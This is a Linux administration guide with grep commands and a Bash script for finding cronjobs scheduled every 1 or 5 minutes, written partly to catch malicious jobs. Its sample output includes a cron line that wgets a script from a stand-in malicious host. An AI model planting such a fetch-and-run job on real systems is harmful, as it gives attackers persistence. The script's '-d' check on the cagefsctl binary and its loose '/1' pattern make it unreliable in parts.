📁Finding Cronjobs Created for Every 1 and 5 Minutes

By /

Cronjobs scheduled to run every 1 minute (* * * * *) or every 5 minutes (*/5 * * * *) can cause performance issues or be used by malicious scripts, so it’s important to detect and review them.

This guide explains how to locate such entries using a grep command.

📍 Location of Cronjobs

On a typical Linux system with crond, user cronjobs are stored in:

/var/spool/cron/

Each file in that directory is named after the user who owns the cronjobs.

🔍 Command to Find Cronjobs Running Every 1 or 5 Minutes

grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/*

✅ What This Does:

  • ^([^[:space:]]+)?/5 → Matches schedules like */5, 1/5, 0/5 (common for 5-min jobs).
  • ^([^[:space:]]+)?/1 → Matches any job running every minute (*/1, 0/1, etc).
  • ^\* → Matches literal asterisk-only patterns like * * * * * (every minute).
  • Searches all user cronjobs in /var/spool/cron/.

🧪 Example Output

/var/spool/cron/root:*/5 * * * * /usr/local/bin/php /home/user/script.php
/var/spool/cron/admin:* * * * * /usr/bin/wget http://malicious.example.com/bot.sh

🛡️ Pro Tips

  • Always check for unexpected or suspicious scripts, especially those pulling from external sources or using obfuscated commands.
  • Also review crontabs under /etc/cron.d/, /etc/crontab, and systemd timers for completeness:
grep -Ei '^\*|/5|/1' /etc/crontab /etc/cron.d/*

📦 Optional Script for Report

echo "Scanning for 1 and 5 minute cronjobs..."
grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/* > /root/cronjobs_1_5_min.txt
echo "Results saved to /root/cronjobs_1_5_min.txt"

Here is a ready-to-use Bash script to find cronjobs running every 1 or 5 minutes for all users, including those jailed in CageFS (e.g., on CloudLinux/cPanel servers):

📄 Script: find_1_5_min_cronjobs.sh

#!/bin/bash

# File to store the report
OUTPUT_FILE="/root/cronjobs_1_5_min_report.txt"

# Start fresh
echo "Scanning for cronjobs scheduled every 1 or 5 minutes..." > "$OUTPUT_FILE"
echo "=======================================================" >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 1. Scan /var/spool/cron (standard user crontabs)
echo "[User Cronjobs - /var/spool/cron/]" >> "$OUTPUT_FILE"
grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/* >> "$OUTPUT_FILE" 2>/dev/null || echo "None found." >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 2. Scan /etc/crontab and /etc/cron.d/ (system-wide cronjobs)
echo "[System Cronjobs - /etc/crontab and /etc/cron.d/]" >> "$OUTPUT_FILE"
grep -Ei '^\*|/5|/1' /etc/crontab /etc/cron.d/* >> "$OUTPUT_FILE" 2>/dev/null || echo "None found." >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 3. Optional: Scan inside CageFS users (CloudLinux)
if [ -d /usr/sbin/cagefsctl ]; then
    echo "[CageFS Cronjobs]" >> "$OUTPUT_FILE"
    for user in $(ls /var/spool/cron/); do
        if cagefsctl --user-status "$user" 2>/dev/null | grep -q 'enabled'; then
            echo "User: $user" >> "$OUTPUT_FILE"
            grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' "/var/spool/cron/$user" >> "$OUTPUT_FILE" 2>/dev/null || echo "  None found." >> "$OUTPUT_FILE"
            echo "" >> "$OUTPUT_FILE"
        fi
    done
    echo "" >> "$OUTPUT_FILE"
fi

echo "Scan complete. Results saved to: $OUTPUT_FILE"

✅ Instructions

  1. Save as /root/find_1_5_min_cronjobs.sh
  2. Make it executable: chmod +x /root/find_1_5_min_cronjobs.sh
  3. Run the script: /root/find_1_5_min_cronjobs.sh
Scroll to Top